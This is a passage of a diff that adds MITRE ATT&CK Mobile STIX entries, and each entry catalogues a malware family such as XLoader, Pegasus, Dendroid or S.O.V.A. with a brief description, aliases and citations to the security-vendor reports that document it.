(Citation: Lookout-NotCompatible)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "created": "2017-10-25T14:48:36.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0299", + "external_id": "S0299" + }, + { + "source_name": "NotCompatible", + "description": "(Citation: Lookout-NotCompatible)" + }, + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XLoader for Android", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "XLoader for Android" + ], + "type": "malware", + "id": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0318", + "external_id": "S0318" + }, + { + "source_name": "XLoader for Android", + "description": "(Citation: TrendMicro-XLoader)" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + }, + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "created": "2017-10-25T14:48:46.107Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0306", + "external_id": "S0306" + }, + { + "source_name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "XLoader for iOS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "type": "malware", + "created": "2020-07-20T13:58:53.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0490", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0490" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2021-12-07T14:46:08.852Z", + "name": "XLoader for iOS", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-13T22:33:55.061Z", + "name": "AbstractEmu", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "AbstractEmu" + ], + "type": "malware", + "id": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "created": "2023-02-06T18:48:41.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1061", + "external_id": "S1061" + }, + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exodus", + "Exodus One", + "Exodus Two" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "type": "malware", + "created": "2019-09-03T19:45:47.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0405", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0405" + }, + { + "source_name": "Exodus One", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "Exodus Two", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T17:15:52.191Z", + "name": "Exodus", + "description": "[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Dendroid", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Dendroid" + ], + "type": "malware", + "id": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "created": "2017-10-25T14:48:37.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0301", + "external_id": "S0301" + }, + { + "source_name": "Dendroid", + "description": "(Citation: Lookout-Dendroid)" + }, + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "WireLurker", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "created": "2017-10-25T14:48:37.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0312", + "external_id": "S0312" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Desert Scorpion" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "type": "malware", + "created": "2020-09-11T14:54:16.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0505", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0505" + }, + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2021-04-19T17:11:50.159Z", + "name": "Desert Scorpion", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for iOS", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for iOS" + ], + "type": "malware", + "id": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "created": "2017-10-25T14:48:44.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0289", + "external_id": "S0289" + }, + { + "source_name": "Pegasus for iOS", + "description": "(Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab)" + }, + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + }, + { + "source_name": "PegasusCitizenLab", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Tangelo", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Tangelo" + ], + "type": "malware", + "id": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0329", + "external_id": "S0329" + }, + { + "source_name": "Tangelo", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RCSAndroid", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RCSAndroid" + ], + "type": "malware", + "id": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "created": "2017-10-25T14:48:38.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0295", + "external_id": "S0295" + }, + { + "source_name": "RCSAndroid", + "description": "(Citation: TrendMicro-RCSAndroid)" + }, + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Corona Updates", + "Wabi Music", + "Concipit1248" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "type": "malware", + "created": "2020-04-24T15:06:32.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0425", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0425" + }, + { + "source_name": "Wabi Music", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "Concipit1248", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.235Z", + "name": "Corona Updates", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Skygofree", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Skygofree" + ], + "type": "malware", + "id": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0327", + "external_id": "S0327" + }, + { + "source_name": "Skygofree", + "description": "(Citation: Kaspersky-Skygofree)" + }, + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "KeyRaider", + "description": "[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "created": "2017-10-25T14:48:43.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0288", + "external_id": "S0288" + }, + { + "source_name": "KeyRaider", + "description": "(Citation: Xiao-KeyRaider)" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ZergHelper", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "created": "2017-10-25T14:48:44.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0287", + "external_id": "S0287" + }, + { + "source_name": "ZergHelper", + "description": "(Citation: Xiao-ZergHelper)" + }, + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DoubleAgent" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "type": "malware", + "created": "2020-12-24T21:50:02.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0550", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0550" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T17:05:42.253Z", + "name": "DoubleAgent", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Twitoor", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Twitoor" + ], + "type": "malware", + "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "created": "2017-10-25T14:48:42.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0302", + "external_id": "S0302" + }, + { + "source_name": "Twitoor", + "description": "(Citation: ESET-Twitoor)" + }, + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-13T22:32:16.509Z", + "name": "S.O.V.A.", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for \"owl\", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "S.O.V.A." + ], + "type": "malware", + "id": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "created": "2023-02-06T19:34:43.026Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1062", + "external_id": "S1062" + }, + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + }, + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ANDROIDOS_ANSERVER.A", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "ANDROIDOS_ANSERVER.A" + ], + "type": "malware", + "id": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "created": "2017-10-25T14:48:47.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0310", + "external_id": "S0310" + }, + { + "source_name": "ANDROIDOS_ANSERVER.A", + "description": "(Citation: TrendMicro-Anserver)" + }, + { + "source_name": "TrendMicro-Anserver", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DualToy", + "description": "[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], 